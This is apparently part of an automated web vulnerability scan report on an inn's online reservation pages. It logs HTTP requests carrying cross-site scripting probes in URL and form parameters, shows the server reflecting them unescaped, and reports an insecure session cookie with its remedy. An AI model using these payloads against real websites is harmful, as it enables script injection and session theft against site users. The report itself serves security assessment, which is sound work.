Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=NNEOLOPACIJJPGIHLLPPAKFH
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:14:08 GMT
X-Powered-By: ASP.NET
Content-Length: 12130
Content-Type: text/html
Cache-control: private



<html>
<head>
<link rel="stylesheet" href="webviewstyle.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C" type="text/css">
<title>Online Reservations and Availability</title>
<script>
var statusmsg=""

function hidestatus(){
window.status=statusmsg
return true
}

</script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head>
<body>
<br><TABLE cellSpacing=0 cellPadding=0 width=745 align=center border=0>
<TBODY>
<TR>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=16 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=54 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=58 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=112 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=109 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=82 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=135 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=156 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=17 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=6 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD colSpan=10><IMG height=75
alt="Hanover House Inn on Martha's Vineyard - Arrive as Strangers, Leave as Friends. 800-339-1066"
src="https://www.superinn.com/db/381/webview/top.jpg"
width=745 border=0 name=top></TD>
<TD><IMG height=75
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD vAlign=top
background="https://www.superinn.com/db/381/webview/left.jpg"><IMG
height=29
src="https://www.superinn.com/db/381/webview/topleft.jpg"
width=16 border=0 name=topleft></TD>
<TD align=left
background="https://www.superinn.com/db/381/webview/template2_r2_c9.jpg"
colSpan=8>
<A target="_top"
href="http://www.hanoverhouseinn.com/index.shtml"><IMG height=29
alt="Hanover House Home Page"
src="https://www.superinn.com/db/381/webview/home.jpg"
width=54 border=0 name=home></A><A target="_top"
href="http://www.hanoverhouseinn.com/rates.shtml"><IMG height=29 alt=Rates
src="https://www.superinn.com/db/381/webview/rates.jpg"
width=58 border=0 name=rates></A><A target="_top"
href="http://www.hanoverhouseinn.com/specials.shtml"><IMG height=29
alt="Special Offers at the Hanover House B&amp;B"
src="https://www.superinn.com/db/381/webview/specials.jpg"
width=112 border=0 name=specials></A><A target="_top"
href="http://www.hanoverhouseinn.com/rooms.shtml"><IMG height=29
alt="Guest Rooms"
src="https://www.superinn.com/db/381/webview/rooms.jpg"
width=109 border=0 name=rooms></A><A target="_top"
href="http://www.hanoverhouseinn.com/location.shtml"><IMG height=29
alt="Where we are located on Martha's Vineyard"
src="https://www.superinn.com/db/381/webview/location.jpg"
width=82 border=0 name=mlocation></A><A
onclick="MM_openBrWindow('http://www.hanoverhouseinn.com/brochure.shtml','','menubar=yes,scrollbars=yes,resizable=yes,width=590,height=400')"
href="javascript:;"><IMG height=29
alt="Click here for a printable brochure"
src="https://www.superinn.com/db/381/webview/print.jpg"
width=135 border=0 name=print></A><A target="_top"
href="https://www.superinn.com/webview1.asp?dk=The_Hanover_House"
target=_blank><IMG height=29 alt="Online Reservations"
src="https://www.superinn.com/db/381/webview/onlinereservations.jpg"
width=156 border=0 name=onlinereservations></A> </TD>
<TD vAlign=top
background="https://www.superinn.com/db/381/webview/right.jpg"><IMG
height=29
src="https://www.superinn.com/db/381/webview/topright.jpg"
width=6 border=0 name=topright></TD>
<TD><IMG height=29
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD
background="https://www.superinn.com/db/381/webview/left.jpg"><IMG
height=392
src="https://www.superinn.com/db/1/webview/left.jpg"
width=16 border=0 name=left></TD>
<TD vAlign=top bgColor=#ffffff colSpan=8 rowSpan=2>


<script>
function CheckDate()
{
d=form1.text1.value; //if none selected d = false
if (d=='') {
alert('Please enter a check-in date.');
form1.text1.focus();
return false ;
}

e=form1.text2.value; //if none selected d = false
if (e=='' || isNaN(e)) {
alert('Please enter a number under number of nights.');
form1.text2.focus();
return false ;
}

f= 0 + form1.text3.value; //if none selected d = false
if (f<1 || isNaN(f)) {
alert('Please enter a number under number of guests.');
form1.text3.focus();
return false ;
}
}
</script>

<form name="form1" action="res_1_B.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C" method="post" >

<div align="center"><br>
<img src='../db/381/webview//nav1.gif'><br><br>

<table width="400" id="box" align="center" cellspacing="1">
<tr>
<td height="30" class="boxoff" align="center"><span class="boxheader">Check Availability</span>
</td>
</tr>
<tr>
<td nowrap class="boxoff">
<table width="350" cellspacing="5" class="boxheader">
<tr>
<td width="190">Please Select A Check In Date:
<td width="160"><a name="dcdummy:27"><input name="text1" value="'" ns= netsparker(0x00038C) " size="12" onFocus="this.blur()"></a>&nbsp;<a href="javascript:void(0)" onclick="if(self.gfPop)gfPop.fPopCalendar(document.form1.text1);return false;"><img class="PopcalTrigger" align="absmiddle" src="../cal07/normal/calbtn.gif" width="34" height="22" border="0" alt=""></a>
<tr>
<td colspan="2" align="right" class="text10">(Use Calendar to select a date)
<tr>
<td>Enter Number of Nights:
<td><input type="text" name="text2" size="2" maxlength="2" value="">
<tr>
<td>Enter Number of Guests:
<td valign="top"><input type="text" name="text3" size="2" maxlength="2"
value='2'><tr><td colspan=2>Sorry, we do not allow pets.
</table>

</font></b> </p>
<p align="center">
<input type="submit" name="Submit" value="CHECK AVAILABILITY" onClick="return CheckDate()" class="formBtnb185">

<input type="BUTTON" onClick="location.href='res_avail.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C'" value="RETURN TO CHART" name="BUTTON" class="formBtnb185">

<br>
<br>
</p>
<input type="hidden" name="rnum" value="1">

<script language="javascript">
document.form1.text2.focus();
</script>

</td>
</tr>
</table>
<br>
<table class=boldtable width="430" border="0" cellspacing="0" cellpadding="3" align="center">
<tr>
<td>

</td>
</tr>
</table>
</div>
</form>

<div align="center">
<a class="linkssml" href="http://www.sarktech.com" target="_blank">Availability and Reservations Powered by SuperINN.com</a><br><br></div>
<TD
background="https://www.superinn.com/db/381/webview/right.jpg"
rowSpan=2><IMG height=426
src="https://www.superinn.com/db/381/webview/right.jpg"
width=6 border=0 name=right></TD>
<TD><IMG height=392
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD
background="https://www.superinn.com/db/381/webview/leftback.jpg"><IMG
height=34
src="https://www.superinn.com/db/381/webview/leftback.jpg"
width=16 border=0 name=leftback></TD>
<TD><IMG height=34
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD colSpan=10><IMG height=4
src="https://www.superinn.com/db/381/webview/bottomborder.jpg"
width=745 border=0 name=bottomborder></TD>
<TD><IMG height=4
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR></TBODY></TABLE>
<DIV align=center><BR>
<SCRIPT language=JavaScript>
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
//-->
</SCRIPT>

<DIV align=center>
<P><SPAN class=bottomnav><A target="_top" class=bottomnav
href="http://www.hanoverhouseinn.com/index.shtml">Home</A> ~ <A target="_top" class=bottomnav
href="http://www.hanoverhouseinn.com/rates.shtml">Rates</A> ~ <A target="_top" class=bottomnav
href="http://www.hanoverhouseinn.com/specials.shtml">Special Offers</A> ~ <A
target="_top" class=bottomnav href="http://www.hanoverhouseinn.com/rooms.shtml">Guest
Rooms</A> ~ <A target="_top" class=bottomnav
href="http://www.hanoverhouseinn.com/location.shtml">Location</A> ~ </SPAN><A
class=bottomnav
onclick="MM_openBrWindow('http://www.hanoverhouseinn.com/brochure.shtml','','toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,width=590,height=400')"
href="javascript:;">Printable Brochure</A> <SPAN class=bottomnav>~ </SPAN><A
class=bottomnav href="https://www.superinn.com/webview1.asp?dk=The_Hanover_House"
>Online Reservations</A> <SPAN class=bottomnav>~</SPAN> <A target="_top"
class=bottomnav href="http://www.twinoaksinn.net/">Twin Oaks Inn Home
Page</A><BR><IMG height=28 alt="The Hanvoer House Inn"
src="https://www.superinn.com/db/381/webview/footer2.jpg"
width=427> <BR><SPAN class=bottomnav>PO Box 2108, 28 Edgartown Road, Vineyard
Haven, Massachusetts 02568<BR></SPAN><SPAN class=bottomnavstrong>Reservations:
(800) 696-8633 ~ FAX - (508) 696-6099&nbsp;~ EMAIL: </SPAN>
<SCRIPT language=javascript class=bottomnavstrong>
<!--
var username="innkeeper";
var hostname="hanoverhouseinn.com";
var textstyle="bottomnavstrong";
var linktext= username + "@" + hostname;
document.write("<a href=" + "mail" + "to:" + username + "@" + hostname + "> <span class=" + textstyle+ ">" + linktext + "</span></a>")
//--></SCRIPT>
<SPAN class=bottomnavstrong><BR></SPAN><SPAN class=bottomnav>No smoking. No
pets. <BR><IMG height=36 alt="Located in Vineyard Haven on Martha's Vineyard"
src="https://www.superinn.com/db/381/webview/hleafdiv2.jpg"
width=380> <BR>Copyright �
<SCRIPT language=JavaScript><!--
function makeArray() {
for (i = 0; i<makeArray.arguments.length; i++)
this[i + 1] = makeArray.arguments[i];
}

var months = new makeArray('January','February','March',
'April','May','June','July','August','September',
'October','November','December');

var date = new Date();
var day = date.getDate();
var month = date.getMonth() + 1;
var yy = date.getYear();
var year = (yy < 1000) ? yy + 1900 : yy;

document.write(year);
//--></SCRIPT>
Hanover House all rights reserved.</SPAN>
</P></DIV></DIV><test main>
<iframe width=152 height=163 name="gToday:outlook:agenda.js" id="gToday:outlook:agenda.js" src="../cal07/webview/ipopeng.htm" scrolling="no" frameborder="0" style="visibility:visible; z-index:999; position:absolute; top:-500px; left:-500px;">
<LAYER name="gToday:outlook:agenda.js" src="../cal07/webview/npopeng.htm" background="../cal07/webview/npopeng.htm"> </LAYER>
</iframe>


</body>
</html>
- /copy1/res_avail.asp

/copy1/res_avail.asp

https://www.superinn.com/copy1/res_avail.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x000478))%3E

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x000478))>
submit POST Next 12 days

Request

POST /copy1/res_avail.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x000478))%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/res_avail.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=NNEOLOPACIJJPGIHLLPPAKFH
Content-Length: 19
Expect: 100-continue
Accept-Encoding: gzip, deflate

submit=Next+12+days

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:19:49 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x000478))><br>
- /copy1/res_1_B.asp

/copy1/res_1_B.asp

https://www.superinn.com/copy1/res_1_B.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x0004DF))%3E

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x0004DF))>
text1 POST 8/14/2011
text2 POST 3
text3 POST 2
Submit POST CHECK AVAILABILITY
BUTTON POST RETURN TO CHART
rnum POST 1

Request

POST /copy1/res_1_B.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x0004DF))%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C&mdate=8/14/2011&rnum=1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=NNEOLOPACIJJPGIHLLPPAKFH
Content-Length: 91
Expect: 100-continue
Accept-Encoding: gzip, deflate

text1=8%2f14%2f2011&text2=3&text3=2&Submit=CHECK+AVAILABILITY&BUTTON=RETURN+TO+CHART&rnum=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:22:29 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x0004DF))><br>
- /copy1/res_1_B.asp

/copy1/res_1_B.asp

https://www.superinn.com/copy1/res_1_B.asp?crypt=%3C/a%20style=x:expre/**/ssion(alert(0x000586))%3E

Parameters

Parameter Type Value
crypt GET </a style=x:expre/**/ssion(alert(0x000586))>
text1 POST 8/14/2011
text2 POST 3
text3 POST 2
Submit POST CHECK AVAILABILITY
rnum POST 1

Request

POST /copy1/res_1_B.asp?crypt=%3C/a%20style=x:expre/**/ssion(netsparker(0x000586))%3E HTTP/1.1
Referer: https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C&mdate=8/14/2011&rnum=1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=JFGOLOPAALLCHINFEDBMAEHE
Content-Length: 68
Expect: 100-continue
Accept-Encoding: gzip, deflate

text1=8%2f14%2f2011&text2=3&text3=2&Submit=CHECK+AVAILABILITY&rnum=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:25:11 GMT
X-Powered-By: ASP.NET
Content-Length: 154
Content-Type: text/html
Cache-control: private


We detected a possible encryption ERROR<br>please contact info@sarktech.com?subject=Encryption Error:</a style=x:expre/**/ssion(netsparker(0x000586))><br>
- /copy1/Res_1.asp

/copy1/Res_1.asp

https://www.superinn.com/copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX..

Parameters

Parameter Type Value
crypt GET �p[������bkP�����}X���ǯ�|
mdate GET 8/14/2011
rnum GET '" ns= alert(0x000615)

Request

GET /copy1/Res_1.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C&mdate=8/14/2011&rnum=%27%22%20ns=%20netsparker(0x000615)%20 HTTP/1.1
Referer: https://www.superinn.com/copy1/res_avail.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: www.superinn.com
Cookie: ASPSESSIONIDCADAAARA=JFGOLOPAALLCHINFEDBMAEHE
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 04:32:10 GMT
X-Powered-By: ASP.NET
Content-Length: 12138
Content-Type: text/html
Cache-control: private



<html>
<head>
<link rel="stylesheet" href="webviewstyle.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C" type="text/css">
<title>Online Reservations and Availability</title>
<script>
var statusmsg=""

function hidestatus(){
window.status=statusmsg
return true
}

</script>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"></head>
<body>
<br><TABLE cellSpacing=0 cellPadding=0 width=745 align=center border=0>
<TBODY>
<TR>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=16 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=54 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=58 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=112 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=109 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=82 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=135 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=156 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=17 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=6 border=0></TD>
<TD><IMG height=1
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD colSpan=10><IMG height=75
alt="Hanover House Inn on Martha's Vineyard - Arrive as Strangers, Leave as Friends. 800-339-1066"
src="https://www.superinn.com/db/381/webview/top.jpg"
width=745 border=0 name=top></TD>
<TD><IMG height=75
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD vAlign=top
background="https://www.superinn.com/db/381/webview/left.jpg"><IMG
height=29
src="https://www.superinn.com/db/381/webview/topleft.jpg"
width=16 border=0 name=topleft></TD>
<TD align=left
background="https://www.superinn.com/db/381/webview/template2_r2_c9.jpg"
colSpan=8>
<A target="_top"
href="http://www.hanoverhouseinn.com/index.shtml"><IMG height=29
alt="Hanover House Home Page"
src="https://www.superinn.com/db/381/webview/home.jpg"
width=54 border=0 name=home></A><A target="_top"
href="http://www.hanoverhouseinn.com/rates.shtml"><IMG height=29 alt=Rates
src="https://www.superinn.com/db/381/webview/rates.jpg"
width=58 border=0 name=rates></A><A target="_top"
href="http://www.hanoverhouseinn.com/specials.shtml"><IMG height=29
alt="Special Offers at the Hanover House B&amp;B"
src="https://www.superinn.com/db/381/webview/specials.jpg"
width=112 border=0 name=specials></A><A target="_top"
href="http://www.hanoverhouseinn.com/rooms.shtml"><IMG height=29
alt="Guest Rooms"
src="https://www.superinn.com/db/381/webview/rooms.jpg"
width=109 border=0 name=rooms></A><A target="_top"
href="http://www.hanoverhouseinn.com/location.shtml"><IMG height=29
alt="Where we are located on Martha's Vineyard"
src="https://www.superinn.com/db/381/webview/location.jpg"
width=82 border=0 name=mlocation></A><A
onclick="MM_openBrWindow('http://www.hanoverhouseinn.com/brochure.shtml','','menubar=yes,scrollbars=yes,resizable=yes,width=590,height=400')"
href="javascript:;"><IMG height=29
alt="Click here for a printable brochure"
src="https://www.superinn.com/db/381/webview/print.jpg"
width=135 border=0 name=print></A><A target="_top"
href="https://www.superinn.com/webview1.asp?dk=The_Hanover_House"
target=_blank><IMG height=29 alt="Online Reservations"
src="https://www.superinn.com/db/381/webview/onlinereservations.jpg"
width=156 border=0 name=onlinereservations></A> </TD>
<TD vAlign=top
background="https://www.superinn.com/db/381/webview/right.jpg"><IMG
height=29
src="https://www.superinn.com/db/381/webview/topright.jpg"
width=6 border=0 name=topright></TD>
<TD><IMG height=29
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD
background="https://www.superinn.com/db/381/webview/left.jpg"><IMG
height=392
src="https://www.superinn.com/db/1/webview/left.jpg"
width=16 border=0 name=left></TD>
<TD vAlign=top bgColor=#ffffff colSpan=8 rowSpan=2>


<script>
function CheckDate()
{
d=form1.text1.value; //if none selected d = false
if (d=='') {
alert('Please enter a check-in date.');
form1.text1.focus();
return false ;
}

e=form1.text2.value; //if none selected d = false
if (e=='' || isNaN(e)) {
alert('Please enter a number under number of nights.');
form1.text2.focus();
return false ;
}

f= 0 + form1.text3.value; //if none selected d = false
if (f<1 || isNaN(f)) {
alert('Please enter a number under number of guests.');
form1.text3.focus();
return false ;
}
}
</script>

<form name="form1" action="res_1_B.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C" method="post" >

<div align="center"><br>
<img src='../db/381/webview//nav1.gif'><br><br>

<table width="400" id="box" align="center" cellspacing="1">
<tr>
<td height="30" class="boxoff" align="center"><span class="boxheader">Check Availability</span>
</td>
</tr>
<tr>
<td nowrap class="boxoff">
<table width="350" cellspacing="5" class="boxheader">
<tr>
<td width="190">Please Select A Check In Date:
<td width="160"><a name="dcdummy:27"><input name="text1" value="8/14/2011" size="12" onFocus="this.blur()"></a>&nbsp;<a href="javascript:void(0)" onclick="if(self.gfPop)gfPop.fPopCalendar(document.form1.text1);return false;"><img class="PopcalTrigger" align="absmiddle" src="../cal07/normal/calbtn.gif" width="34" height="22" border="0" alt=""></a>
<tr>
<td colspan="2" align="right" class="text10">(Use Calendar to select a date)
<tr>
<td>Enter Number of Nights:
<td><input type="text" name="text2" size="2" maxlength="2" value="">
<tr>
<td>Enter Number of Guests:
<td valign="top"><input type="text" name="text3" size="2" maxlength="2"
value='2'><tr><td colspan=2>Sorry, we do not allow pets.
</table>

</font></b> </p>
<p align="center">
<input type="submit" name="Submit" value="CHECK AVAILABILITY" onClick="return CheckDate()" class="formBtnb185">

<input type="BUTTON" onClick="location.href='res_avail.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7DX%B2%9A%B9%C7%AF%AA%7C'" value="RETURN TO CHART" name="BUTTON" class="formBtnb185">

<br>
<br>
</p>
<input type="hidden" name="rnum" value="'" ns= netsparker(0x000615) ">

<script language="javascript">
document.form1.text2.focus();
</script>

</td>
</tr>
</table>
<br>
<table class=boldtable width="430" border="0" cellspacing="0" cellpadding="3" align="center">
<tr>
<td>

</td>
</tr>
</table>
</div>
</form>

<div align="center">
<a class="linkssml" href="http://www.sarktech.com" target="_blank">Availability and Reservations Powered by SuperINN.com</a><br><br></div>
<TD
background="https://www.superinn.com/db/381/webview/right.jpg"
rowSpan=2><IMG height=426
src="https://www.superinn.com/db/381/webview/right.jpg"
width=6 border=0 name=right></TD>
<TD><IMG height=392
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD
background="https://www.superinn.com/db/381/webview/leftback.jpg"><IMG
height=34
src="https://www.superinn.com/db/381/webview/leftback.jpg"
width=16 border=0 name=leftback></TD>
<TD><IMG height=34
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR>
<TR>
<TD colSpan=10><IMG height=4
src="https://www.superinn.com/db/381/webview/bottomborder.jpg"
width=745 border=0 name=bottomborder></TD>
<TD><IMG height=4
src="https://www.superinn.com/db/381/webview/spacer.gif"
width=1 border=0></TD></TR></TBODY></TABLE>
<DIV align=center><BR>
<SCRIPT language=JavaScript>
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
//-->
</SCRIPT>

<DIV align=center>
<P><SPAN class=bottomnav><A target="_top" class=bottomnav
href="http://www.hanoverhouseinn.com/index.shtml">Home</A> ~ <A target="_top" class=bottomnav
href="http://www.hanoverhouseinn.com/rates.shtml">Rates</A> ~ <A target="_top" class=bottomnav
href="http://www.hanoverhouseinn.com/specials.shtml">Special Offers</A> ~ <A
target="_top" class=bottomnav href="http://www.hanoverhouseinn.com/rooms.shtml">Guest
Rooms</A> ~ <A target="_top" class=bottomnav
href="http://www.hanoverhouseinn.com/location.shtml">Location</A> ~ </SPAN><A
class=bottomnav
onclick="MM_openBrWindow('http://www.hanoverhouseinn.com/brochure.shtml','','toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,width=590,height=400')"
href="javascript:;">Printable Brochure</A> <SPAN class=bottomnav>~ </SPAN><A
class=bottomnav href="https://www.superinn.com/webview1.asp?dk=The_Hanover_House"
>Online Reservations</A> <SPAN class=bottomnav>~</SPAN> <A target="_top"
class=bottomnav href="http://www.twinoaksinn.net/">Twin Oaks Inn Home
Page</A><BR><IMG height=28 alt="The Hanvoer House Inn"
src="https://www.superinn.com/db/381/webview/footer2.jpg"
width=427> <BR><SPAN class=bottomnav>PO Box 2108, 28 Edgartown Road, Vineyard
Haven, Massachusetts 02568<BR></SPAN><SPAN class=bottomnavstrong>Reservations:
(800) 696-8633 ~ FAX - (508) 696-6099&nbsp;~ EMAIL: </SPAN>
<SCRIPT language=javascript class=bottomnavstrong>
<!--
var username="innkeeper";
var hostname="hanoverhouseinn.com";
var textstyle="bottomnavstrong";
var linktext= username + "@" + hostname;
document.write("<a href=" + "mail" + "to:" + username + "@" + hostname + "> <span class=" + textstyle+ ">" + linktext + "</span></a>")
//--></SCRIPT>
<SPAN class=bottomnavstrong><BR></SPAN><SPAN class=bottomnav>No smoking. No
pets. <BR><IMG height=36 alt="Located in Vineyard Haven on Martha's Vineyard"
src="https://www.superinn.com/db/381/webview/hleafdiv2.jpg"
width=380> <BR>Copyright �
<SCRIPT language=JavaScript><!--
function makeArray() {
for (i = 0; i<makeArray.arguments.length; i++)
this[i + 1] = makeArray.arguments[i];
}

var months = new makeArray('January','February','March',
'April','May','June','July','August','September',
'October','November','December');

var date = new Date();
var day = date.getDate();
var month = date.getMonth() + 1;
var yy = date.getYear();
var year = (yy < 1000) ? yy + 1900 : yy;

document.write(year);
//--></SCRIPT>
Hanover House all rights reserved.</SPAN>
</P></DIV></DIV><test main>
<iframe width=152 height=163 name="gToday:outlook:agenda.js" id="gToday:outlook:agenda.js" src="../cal07/webview/ipopeng.htm" scrolling="no" frameborder="0" style="visibility:visible; z-index:999; position:absolute; top:-500px; left:-500px;">
<LAYER name="gToday:outlook:agenda.js" src="../cal07/webview/npopeng.htm" background="../cal07/webview/npopeng.htm"> </LAYER>
</iframe>


</body>
</html>
Cookie Not Marked As Secure

Cookie Not Marked As Secure

1 TOTAL
IMPORTANT
CONFIRMED
1
A Cookie was not marked as secure and transmitted over HTTPS. This means the cookie could potentially be stolen by an attacker who can successfully intercept and decrypt the traffic or following a successful MITM (Man in the middle) attack.

Impact

This cookie will be transmitted over a HTTP connection, therefore if this cookie is important (such as a session cookie) an attacker might intercept it and hijack a victim's session. If the attacker can carry out a MITM attack, he/she can force victim to make a HTTP request to steal the cookie.

Actions to Take

  1. See the remedy for solution.
  2. Mark all cookies used within the application as secure. (If the cookie is not related to authentication or does not carry any personal information you do not have to mark it as secure.))

Remedy

Mark all cookies used within the application as secure.

Required Skills for Successful Exploitation

To exploit this issue, the attacker needs to be able to intercept traffic. This generally requires local access to the web server or victim's network. Attackers need to be understand layer 2, have physical access to systems either as way points for the traffic, or locally (have gained access to) to a system between the victim and the web server.

Classification

OWASP A6 PCI v2.0-6.5.4 CWE-16 WASC-15
- /copy1/webview.asp

/copy1/webview.asp CONFIRMED

https://www.superinn.com/copy1/webview.asp?crypt=%BF%7Fp%5B%98%BB%B4%B2%A6%98b%7FkP%C1%A8%A6%9A%C1%7..

Identified Cookie

ASPSESSIONIDCADAAARA

Request

